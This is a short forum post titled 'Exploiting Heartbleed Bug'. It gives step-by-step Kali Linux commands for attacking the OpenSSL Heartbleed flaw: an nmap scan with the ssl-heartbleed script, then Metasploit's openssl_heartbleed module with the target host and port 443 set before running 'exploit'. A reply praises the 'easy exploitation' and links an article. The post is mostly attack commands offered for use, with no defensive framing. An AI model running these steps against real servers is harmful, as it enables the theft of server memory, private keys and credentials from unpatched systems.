Exploiting Heartbleed Bug

RedBull
9 years ago

0

Now type in terminal.. Use Kali Linux.
For test ssl:

1.nmap -sV script=ssl-heartbleed 192.168.31.1

2.msfconsole

Now choose openssl_heartbleed

msf > use auxiliary/scanner/ssl/openssl_heartbleed

For show options write :
show options

Now proceed to our attack:
set RHOSTS 192.168.31.1

set RPORT 443

set verbose true

exploit

1reply
5voices
172views
24images
Mugi [Mugiwara27]
9 years ago

0

Easy exploitation :)
Also let’s take a look at the article : https://www.hackthis.co.uk/articles/heartbleed-the-door-to-secret-communications

3 replies have been removed
You must be logged in to reply to this discussion. Login
1 of 2

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss